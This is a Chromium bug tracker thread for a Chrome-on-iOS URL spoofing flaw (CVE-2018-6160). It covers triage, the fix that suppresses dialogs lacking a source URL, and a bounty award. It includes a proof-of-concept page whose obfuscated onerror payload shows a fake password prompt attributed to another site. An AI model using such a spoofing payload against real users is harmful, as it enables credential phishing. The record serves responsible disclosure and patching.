New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 839822 link

Starred by 3 users

Issue metadata

Status: Verified
Owner:
Closed: May 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security



Sign in to add a comment

Chrome URL spoofing vulnerability on IOS

Reported by evi1m0.bat@gmail.com, May 4 2018

Issue description

Steps to reproduce the problem:
1. Open url: https://server.n0tr00t.com/chrome/mobile_url_spoof.html
2. Click test <a> tag
3. We'll see the effect of a successful hijacking

What is the expected behavior?

What went wrong?
PoC:

```
	<html>
	<head>
	    <title>Chrome URL spoofing vulnerability on IOS</title>
	    <!--
	        author: evi1m0.bat[at]gmail.com
	        datetime: 2018/05/03 00:16:27
	        test version: for iPhone 66.0.3359.122
	    -->
	</head>
	<script>
	    pwn = () => {
	        x = open('https://test.baidu.com', 'win');
	        setTimeout(`
	            x.document.write('<img src=@ onerror=eval(atob("dmFyIHB3ZD1wcm9tcHQoImh0dHBzOi8vdGVzdC5iYWlkdS5jb21cbmlucHV0IHlvdXIgcGFzc3dvcmRcbnRlc3QuLi4iKTtpZihwd2Qpe2FsZXJ0KCJwYXNzd29yZDogIitwd2QpfQ=="))><a href="https://google.com/" id="test">test</a>');
	            `, 1000);
	        setTimeout(`
	            x.close();
	            window.location='http://test.baidu.com';
	            `, 1300);
	    }
	</script>
	<h1>
	    <a onclick="pwn()">ClickMe :-)</a>
	</h1>
	</html>
```

Did this work before? N/A 

Chrome version: 66.0.3359.122  Channel: stable
OS Version: 11.3.1
Flash Version: Shockwave Flash 29.0 r0
 
4201722.png
460 KB View Download
Components: Mobile>iOSWebView
Labels: M-67 Security_Severity-Medium Security_Impact-Stable
Owner: rohitrao@chromium.org
Assigning per ios owners, please feel free to re-assign as appropriate.
Cc: rohitrao@chromium.org
Owner: eugene...@chromium.org
+Eugene
Cc: pinkerton@chromium.org pkl@chromium.org noyau@chromium.org marq@chromium.org
And +CC leads
Components: -Mobile>iOSWebView Mobile>WebView>Glue
Labels: -Pri-2 Pri-1
Status: Assigned (was: Unconfirmed)
Cc: eugene...@chromium.org
Components: -Mobile>WebView>Glue UI>Browser>Core
There are 2 problems here:
1.) Alert dialog does not display the URL (https://test.baidu.com is part of the prompt, not the the actual page URL)
2.) AlertPresenter fails to switch to the first tab (tab which requested the prompt)

Assigning to Kurt who owns alert presentation code.
Labels: -M-67 ReleaseBlock-Stable M-68
Owner: kkhorimoto@chromium.org
Sorry. Actually assigning to Kurt per comment #5.
Status: Started (was: Assigned)
I've created crrev.com/c/1058170 to prevent this from happening.  The solution I went with was to automatically suppress dialogs when there is no source URL for the request.  The request is being sent from the WKWebView corresponding with the child window, so from DialogPresenter's perspective, it is behaving correctly, as the correct WebState's content area is in the foreground Tab when the dialog is being shown.
Project Member

Comment 8 by bugdroid1@chromium.org, May 15 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c12ce092c44a325d78baaa9679ecfe7370fd1fe3

commit c12ce092c44a325d78baaa9679ecfe7370fd1fe3
Author: Kurt Horimoto <kkhorimoto@chromium.org>
Date: Tue May 15 01:51:27 2018

[iOS] Suppress dialogs with an invalid request URL

JavaScript dialogs depend on the frame's source request to populate
JavaScript alerts with host information so that the user is aware of
which page is showing the dialog.  If this information is unavailable,
it is unsafe to show the dialog to the user, as it could be used to
trick users into supplying data to a malicious page.

Bug:  839822 
Cq-Include-Trybots: master.tryserver.chromium.mac:ios-simulator-cronet;master.tryserver.chromium.mac:ios-simulator-full-configs
Change-Id: I351b93294179224d5a4ba1ee01d53104c124de8e
Reviewed-on: https://chromium-review.googlesource.com/1058170
Commit-Queue: Kurt Horimoto <kkhorimoto@chromium.org>
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/heads/master@{#558581}
[modify] https://crrev.com/c12ce092c44a325d78baaa9679ecfe7370fd1fe3/ios/web/web_state/ui/crw_web_controller.mm

Status: Fixed (was: Started)
Project Member

Comment 10 by sheriffbot@chromium.org, May 15 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid reward-1000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one evi1m0.bat@, the Chrome VRP panel decided to award $1,000 for this report! A member of our finance team will be in touch to arrange payment. Also, how would you like to be credited in our release notes?
Labels: -reward-unpaid reward-inprocess
Thank for reward. Pls credit: evi1m0 of Bilibili Security Team
Labels: -ReleaseBlock-Stable
Project Member

Comment 17 by sheriffbot@chromium.org, Jun 8

Labels: Merge-Request-68
Project Member

Comment 18 by sheriffbot@chromium.org, Jun 8

Labels: -Merge-Request-68 Hotlist-Merge-Review Merge-Review-68
This bug requires manual review: M68 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), kariahda@(iOS), bhthompson@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Let's get canary verification on this.
Cc: srikanthg@chromium.org
Status: Verified (was: Fixed)
Verified on M69.0.3456.0 canary
iOS: 10.3.3, 12
Device: iPhone, iPad
Labels: -Hotlist-Merge-Review -Merge-Review-68 Merge-Approved-68
Approved!
Project Member

Comment 23 by sheriffbot@chromium.org, Jun 18

Cc: kariahda@chromium.org
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Merge-Approved-68 Merge-Merged
The fix for this bug landed May 15, whereas M68 branched on May 24.  No merge is required here.
Labels: Release-0-M68
Project Member

Comment 26 by sheriffbot@chromium.org, Aug 21

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE-2018-6160 CVE_description-missing

Sign in to add a comment